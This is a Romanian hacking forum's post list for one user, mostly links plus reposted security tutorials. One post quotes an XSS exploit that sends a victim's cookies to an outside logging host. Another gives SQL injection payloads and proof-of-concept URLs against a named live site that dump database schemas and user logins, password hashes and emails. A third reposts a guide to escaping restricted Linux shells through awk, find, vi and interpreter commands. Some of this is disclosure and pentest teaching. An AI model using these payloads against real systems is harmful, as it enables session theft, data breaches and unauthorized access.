Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

  • Days Won


Everything posted by ionut97

  1. La minutul 2:32 apare standul unde erau realizate badge-urile.
  2. ionut97

    Telnet challenge

    Ce afiseaza cand trimitem "echo *" ?
  3. ionut97

    Fun stuff

    How To Write Unmaintainable Code A Part of Windows Code Hello, World: How a Programmer Evolves
  4. Pentru cine vrea sa se uite: http://taz.newffr.com/TAZ/Cryptologie/ReplaceNsaKey.zip
  5. ionut97

    Fun stuff

    Nmap Development: Re: Hakin9's new Nmap Guide
  6. https://www.youtube.com/watch?feature=player_embedded&v=NGrkz3w2Ii8
  7. https://www.youtube.com/watch?v=vjwWej3ALws
  8. https://ro.wikipedia.org/wiki/Romanian_Security_Team_RST Mi se pare destul de cuprinzator articolul.
  9. Thomas H Cormen, Charles E Leiserson, Ronald L Rivest, Clifford Stein - Introduction To Algorithms Mersi!
  10. HACKVIDS This is a list of documentaries and miscellaneous videos about hackers, crackers, phreakers, software pirates and virus writers, compiled by Georgios Apostolidis. Please keep in mind that this page is updated very rarely and some links may be broken. Contact me if you know about a documentary/video, which is not mentioned here. Some titles: -The KGB, the Computer and Me -Unsolved Mysteries: Kevin Poulsen -Hack Attack -Walk on the Wild Side: Hackers and Phreakers -Hackers 95 -Unauthorized Access -Hackers -Codes: makers and breakers -Web Warriors -Hackers Wanted ... Hackvids
  11. In paper scrie clar ca vulnerabilitatea era intr-un js folosit de toate subdomeniile adspecs.yahoo.com. Totul a fost raportat si rezolvat. http://www.exploit-db.com/wp-content/themes/exploit/docs/24109.pdf "Final exploit": <html> <script> window.name=' new Image().src="http://abysssec.com/log/log.php?cookie="+encodeURI(document.cookie); setTimeout(\"location.href = \'http:\/\/www.yahoo.com\';\",10);'; location.href="http://adspecs.yahoo.com/index.php"; </script> </html> + ca XSS-ul putea fi gasit cu DOMinator.
  12. InetDaemon's Online IT Tutorials and Internet Training: Networking, Wireless, Telecom, Web Design Content: [B]Basic IT Tutorials[/B] OSI Model Concepts Digital vs. Analog Full Duplex Half Duplex Simplex Frames Packets PDU's Asynchronous Synchronous Circuits Media Parallel/Serial Point-to-Point Peer-to-Peer Client-Server Connection Oriented Protocols Connectionless Protocols Reliable vs. Unreliable CRC Check Number Systems Binary Octal Decimal Hexadecimal Signalling Signals Wavelength Phase Amplitude Frequency Carrier Analog vs. Digital Media Signal Power / Signal Strength Modulation & Encoding Return to Zero Non-Return to Zero Quadrature Amplitude Modulation (QAM) 2B1Q AMI Manchester Encoding Differential Manchester Encoding [B] Computer Tutorials & Training[/B] Hardware Motherboard Clock Multiplier Bus CPU, Memory, I/O Controller PCI & ISA Software: Operating Systems: Berkeley Software Development UNIX (BSD UNIX) UNIX (Solaris) Linux HP-UX Microsoft Windows Server Server 2000 Server 2003 Server 2008 Windows 7 Server Workstation Windows 95 Windows 98 Windows XP Windows Vista Windows 7 Workstation MacOS Drivers Applications [B]Network Tutorials & Training[/B] Local Area Networks IEEE 802.x protocol Specification Documents (a list) Network Topologies Bus, Hub and Spoke (star), Point-to-Point, Point-to-Multipoint ARP / RARP (address resolution) BootP DHCP Bridging Switching Ethernet FDDI Token Ring ATM Local Area Network Emulation (ATM LANE) Wide Area Networks Serial: v35, v.24, RS-232, EIA/TIA232; HDLC SDLC PPP ATM [B]Satellite Tutorials & Training[/B] Basic Terms Antennas Amplifiers Travelling Wave Tube Klystron Tube Solid State Automatic Repeat Request Bandwidth Allocation Frequency Orbits Polarity Sun Outage Tracking Uplink Chain Wave Guide Basic Concepts [B]Internet Tutorials & Training[/B] Internet Protocol (IP) Internet Control Message Protocol (ICMP) Transmission Control Protocol (TCP and TCP/IP) E-Mail Simple Mail Transfer Protocol (SMTP) Post Office Protocol v3 (POP3) Internet Message Access Protocol (IMAP) HypeText Transport Protocol (HTTP) File Transfer Protocol (FTP) Telnet Secure SHell (ssh) User Datagram Protocol (UDP and UDP/IP) Domain Name Service (DNS) Network Time Protocol (NTP) Simple Network Management Protocol (SNMP) Trivial File Transfer Protocol (TFTP) Internet Protocol v6 (next generation/IPnG) Internet Relay Chat (IRC) Multi-Protocol Label Switching (MPLS) Multicast Internet Gateway Management Protocol (IGMP) Network News Transport Protocol (NNTP) Quality Of Service Simple Network Time Protocol (SNTP) Voice over Internet Protocol (VoIP) [B] World Wide Web Training[/B] Web Servers Web Browsers Web Pages Web Portals Search Engines HypeText Transport Protocol (HTTP) HTML (Creating a web page) SGML Cascading Style Sheets (CSS) CGI Scripting Server Side Includes JavaScript Perl / PHP ASP / JScript / VBScript Java [B]Telecommunications Tutorials & Training[/B] Public Switched Telephone Network (North America) X.25 (grandfather of all telecom protocols) Frame Relay Switched Multi-megabit Data Services (SMDS) Integrated Services Digital Network (ISDN) Digital Signalling System n-Carrier systems T-Carrier T1 T2 T3 T4 J-Carrier J1 J2 J3 J4 E-Carrier E1 E2 E3 E4 Optical Cabling OC3, OC12, OC48, OC192 SONET Synchronous Digital Hierarchy (SDH) xDSL Signalling System 7 Asynchronous Transfer Mode (ATM) Cellular [B]Troubleshooting Tutorials & Training[/B] Fundamentals IP Connectivity LAN Troubleshooting Building a Support Toolkit
  13. by ???Dan & DenJacker What we will be doing is using nested select statements, (subquerys), along with our own variable to bypass the 1024 character limit of group_concat. If you're new to sql, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests. First of, the database/table/columns. (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x) PoC: http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+ Of course, if magic_quotes is enabled you would need to bypass using quotations by using hex values, or using the char() function. View the source, and we see every single database/table/column accessible. Now, to grab information from the columns. (select (@) from (select (@x:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x) PoC: http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+ Sursa: TUTORIAL : [All DB In [1] Request]
  14. Introduction Last year I was approached by a systems engineer and he offered me a steak dinner if I could escape the restricted shell he had set up on a Linux server. The restricted shell was being created due to a request from the development group needing access to certain servers for troubleshooting, and he wanted to restrict what they could do. I don't know about most of you, but a challenge alone from one of my colleagues is more than enough to get me going, but a steak dinner? Where do I sign?! The only thing better would have been a case of beer! I wasn't very familiar with restricted shells so off to Google I went for some assistance. It didn't take long before I noticed there was a lack of information on the topic. Information was scattered and most resources were not very descriptive. In addition to internet research, I also consulted the SANS GPWN e-mail distribution list to see if anybody had any cool tricks. It turns out, they did, but the consensus was that they'd like to see an article published covering this topic. Scope The purpose of this article is to create a better resource for penetration testers to assist them when confronted with a restricted shell. In no way will this be an exhaustive account of all techniques, but instead, I'm going to cite several of the most applicable and effective techniques in this handy reference document. This article is not going to cover defending restricted shell attacks, focus on specific flavors of Linux, nor is it going to cover every restricted shell since they can be configured many ways. Therefore, command line syntax may differ depending on the version of Linux you're familiar with. I will focus mainly on the techniques themselves. Of course, if you find a way to exploit a running process to escalate your privileges, then there is no need to escape the shell. A Restricted Shell...What Is It? It limits a user's ability and only allows them to perform a subset of system commands. Typically, a combination of some or all of the following restrictions are imposed by a restricted shell: Using the 'cd' command to change directories. Setting or unsetting certain environment variables (i.e. SHELL, PATH, etc...). Specifying command names that contain slashes. Specifying a filename containing a slash as an argument to the '.' built-in command. Specifying a filename containing a slash as an argument to the '-p' option to the 'hash' built-in command. Importing function definitions from the shell environment at startup. Parsing the value of SHELLOPTS from the shell environment at startup. Redirecting output using the '>', '>|', '', '>&', '&>', and '>>' redirection operators. Using the 'exec' built-in to replace the shell with another command. Adding or deleting built-in commands with the '-f' and '-d' options to the enable built-in. Using the 'enable' built-in command to enable disabled shell built-ins. Specifying the '-p' option to the 'command' built-in. Turning off restricted mode with 'set +r' or 'set +o restricted'. Since business needs override security a good portion of the time, it's possible that some of the above restrictions are relaxed. So do not assume that these restrictions are set in stone. I suggest you QC the quality of the restricted shell. Reconnaissance The first step should be to gather a little information. You'll need to know your environment. Run the 'env' command to understand how your profile is configured. You'll see which shell you're running and where your PATH is pointing to. Once you know what your PATH is, list the contents of the directory (i.e. 'ls /usr/local/rbin') to see which commands are present. It is possible you may not be able to run the 'ls' command. If not, you can use the 'echo' command with an asterisk to 'glob' directory contents if it's available: echo /usr/local/rbin/* You can continue on through the file system using this command to help you find other files and commands. Basically, you'll be armed with built-in shell commands as well as the ones listed in your PATH. This is your arsenal for attacking the restricted shell, but there may be exceptions as we'll find out. Once you know which commands you can execute, research each one of them to see if there are known shell escapes associated with them. Some of the techniques we're about to get into can be combined together. Change PATH or SHELL Environment Variables Type 'export —p' to see the exported variables in the shell. What this will also show you is which variables are read-only. You'll note that most likely the PATH and SHELL variables are '—rx', which means you execute them, but not write to them. If they are writeable, then you can start giggling now as you'll be able to escape the restricted shell in no time! If the SHELL variable is writeable, you can simply set it to your shell of choice (i.e. sh, bash, ksh, etc...). If the PATH is writeable, then you'll be able to set it to any directory you want. I recommend setting it to one that has commands vulnerable to shell escapes. Copying Files If you're able to copy files into your PATH, then you'll be able to bypass the forward slash restriction. The sky is the limit at this point as you can copy commands into the PATH that have known shell escapes. You can also write your own script, copy it to the PATH, and execute it. Another technique is to try and copy files to your home directory and execute them from there. Execution will be difficult as you will have to use './' in order to get it to run, and as we already know, it will fail since the restricted shell will not allow the use of a forward slash. Keep in mind, you may be able to get the commands you copy to your home directory to run if you're able to couple it with another command that has a shell escape. Other ways you may be able to copy files or get access to them include mounting a device or file system. You may also be able to copy them to your system using a program that can copy files such as SCP or FTP. Try to find directories other than your PATH where you can execute commands from. If you have write access to them, you can copy commands here and may be able to execute them. Lastly, consider creating a symbolic link in a directory where you have write access and the ability to run commands Editors One of the most well documented techniques is to spawn a shell from within an editor such as 'vi' or 'vim'. Open any file using one of these editors and type the following and execute it from within the editor: :set shell=/bin/bash Next, type and execute: :shell Another method is to type: :! /bin/bash If either of these works, you will have an unrestricted shell from within the editor. Most modern restricted shells already defend against this hack, but it's always worth a shot. You may be working from a restricted editor such as rvi or rvim, which will almost certainly stop a shell from spawning. Also, try different shells with this technique and ones that follow as some restricted shells may block 'sh' or 'bash'. Awk Command If you can run 'awk', you can attempt to execute a shell from within it. Type the following: awk 'BEGIN {system("/bin/sh")}' If successful, you'll see an unrestricted shell prompt! Find Command If the 'find' command is present, you can attempt to use the '-exec' function within it. Type the following: find / -name blahblah —exec /bin/awk 'BEGIN {system("/bin/sh")}' \; Again, if successful, you'll see a blinking cursor at an unrestricted shell prompt! Note that in the above example, you are able to call the 'awk' command even if it is not present in our PATH. This is important because you are able to bypass the restriction of only being permitted to execute commands in your PATH. You are not limited to the 'awk' command. More, Less, and Man Commands There is a known escape within these commands. After you use the 'more', 'less', or 'man' command with a file, type '!' followed by a command. For instance, try the following once inside the file: '! /bin/sh' '!/bin/sh '!bash' Like the shell escape in 'awk' and 'find', if successful, you'll be sitting at an unrestricted shell prompt. Note you can try different shells, and the space after the '!' may not matter. Tee Command If you do not have access to an editor, and would like to create a script, you can make use of the 'tee' command. Since you cannot make use of '>' or '>>', the 'tee' command can help you direct your output when used in tandem with the 'echo' command. This is not a shell escape in of itself, but consider the following: echo "evil script code" | tee script.sh You will be able to create a file called script.sh in your home directory and add your script code to the file. Once the file is created, use the 'tee —a' option for all subsequent commands as the '-a' allows you to append to the file rather than overwrite the file. Favorite Language? Try invoking a SHELL through your favorite language: python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read() perl —e 'exec "/bin/sh";' perl: exec "/bin/sh"; ruby: exec "/bin/sh" lua: os.execute('/bin/sh') irb(main:001:0> exec "/bin/sh" Most likely, you will not be able to execute any of these, but it's worth a shot in case they're installed. Files Executed in Unrestricted Mode? Some restricted shells will start by running some files in an unrestricted mode before the restricted shell is applied. If your .bash_profile is executed in an unrestricted mode and it's editable, you'll be able to execute code and commands as an unrestricted user. Conclusion This article is far from conclusive on techniques used to escape restricted shells, but hopefully it was informative and helped you learn some new tricks. What I've come to discover is that there are many ways to attack a restricted shell. You truly are only limited by your imagination. I encourage everyone to try these methods and expand on them and develop new techniques! Sursa: Escaping Restricted Linux Shells
  15. Description: In this video I will show you how to use this four modules. HTTP Virtual Host Brute Force Scanner | Metasploit Exploit Database (DB) HTTP Directory Scanner | Metasploit Exploit Database (DB) Archive.org Stored Domain URLs | Metasploit Exploit Database (DB) HTTP SSL Certificate Impersonation | Metasploit Exploit Database (DB) 1 ) auxiliary/scanner/http/vhost_scanner This module tries to identify unique virtual hosts hosted by the target web server. 2 ) auxiliary/scanner/http/dir_scanner This module identifies the existence of interesting directories in a given directory path. 3 ) auxiliary/scanner/http/enum_wayback This module pulls and parses the URLs stored by Archive.org for the purpose of replaying during a web assessment. Finding unlinked and old pages. 4 ) auxiliary/scanner/http/impersonate_ssl This module request a copy of the remote SSL certificate and creates a local (self.signed) version using the information from the remote version. The module then Outputs (PEM|DER) format private key / certificate and a combined version for use in Apache or other Metasploit modules requiring SSLCert Inputs for private key / CA cert have been provided for those with diginator certs hanging about! Source : - Penetration Testing Software | Metasploit Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:
  16. Reverse Engineering & Malware Analysis Training Content: Part 1 - RE & Malware Analysis Lab Setup Guide Part 2 - Introduction to Windows Internals Part 3 - Windows PE File Format Basics Part 4 - Assembly Programming Basics Part 5 - Reverse Engineering Basics and Tool Guide Part 6 - Practical Reversing I - Malware Analysis Part 7 - Practical Reversing II - Unpacking Malware Part 8 - Practical Reversing III - Malware Memory Forensics Part 9 - Practical Reversing IV - Advanced Malware Analysis Part 10 - Practical Reversing V - Exploit Development [basic] Part 11 - Practical Reversing VI - Exploit Development [advanced] Part 12 - Case Study: Rootkit Analysis Part 13 - Further Reading & Future Roadmap Videos: Security Training Videos | www.SecurityXploded.com
  • Create New...